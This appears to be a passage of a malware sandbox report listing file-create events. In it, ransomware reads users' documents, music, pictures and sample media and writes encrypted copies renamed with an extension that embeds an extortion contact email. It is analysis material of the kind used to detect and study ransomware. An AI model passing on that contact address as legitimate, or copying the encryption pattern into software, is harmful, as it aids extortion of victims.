| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy\iBfu.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VUI8dbs8a6E_sx\P8zp2XCMXw.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VUI8dbs8a6E_sx\P8zp2XCMXw.xls.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\4iwqzF.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\4iwqzF.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\a5dhGkcTB.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\a5dhGkcTB.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\OL7y0aLIe1l Ba.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\OL7y0aLIe1l Ba.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\dUpJtg1.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\dUpJtg1.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\fFkeFtZ2Z5.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\fFkeFtZ2Z5.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\ieKMX0j.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\ieKMX0j.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\xszehA.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\xszehA.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\xW-n3_p_3dY 5mikTtT.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g\xW-n3_p_3dY 5mikTtT.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\00qL64xco7jJFRN.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\00qL64xco7jJFRN.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\8UCtqjG T.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\8UCtqjG T.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\DhPYYBsDdEz8y2Tp5G.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\DhPYYBsDdEz8y2Tp5G.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\Qkpnh1.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\Qkpnh1.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\_ssO1obM_rYEoza.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb\_ssO1obM_rYEoza.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\03SUMIX5JDW.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\03SUMIX5JDW.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\7wybN.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\7wybN.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\eX8LA0kShDJo0.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\eX8LA0kShDJo0.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\A0V0PHPNzfBYDIW3\ZSzEbqP5wBw_As4ePI.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\A0V0PHPNzfBYDIW3\ZSzEbqP5wBw_As4ePI.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dlnFWX8-gis4AfHnlPs\uy49_okRXbzoAe6.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dlnFWX8-gis4AfHnlPs\uy49_okRXbzoAe6.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\YqeM\y-YdH.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\YqeM\y-YdH.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\YqeM\Y_ylZcrgV2CzxB.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\YqeM\Y_ylZcrgV2CzxB.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\7wzhjuMwDuZmmMvgc74K.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\7wzhjuMwDuZmmMvgc74K.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\N r AvQf0-UpG.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\N r AvQf0-UpG.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\e72U IRf6OCgKNDRNS.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\e72U IRf6OCgKNDRNS.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Kalimba.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Kalimba.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Sleep Away.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Music\Sample Music\Sleep Away.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Desert.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Koala.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Videos\Sample Videos\Wildlife.wmv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\0xbtmHyQyZntSbtdUT.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\0xbtmHyQyZntSbtdUT.xls.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\FmJ7xW_w.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\FmJ7xW_w.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\FXSAPIDebugLogFile.txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\gLQJ3vh8ZwSQ.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\gLQJ3vh8ZwSQ.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\KDbX.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\KDbX.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\N 6 Uer0w8ra.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\N 6 Uer0w8ra.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\NZpznu 2OPL4V.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\NZpznu 2OPL4V.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\OTOSKYv9ueQT4xz1aZZW.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\OTOSKYv9ueQT4xz1aZZW.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\pF4BNSkWI5jCzp.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\pF4BNSkWI5jCzp.xls.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\rZ39JyZHmRZ5W.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\rZ39JyZHmRZ5W.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\sCGK16wPuOiYVlI88.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\sCGK16wPuOiYVlI88.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\t9jDBqskTB2i0.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\t9jDBqskTB2i0.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\TvSB4PkstpPqW.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\TvSB4PkstpPqW.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\U7Ck jv55O 3qWII.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
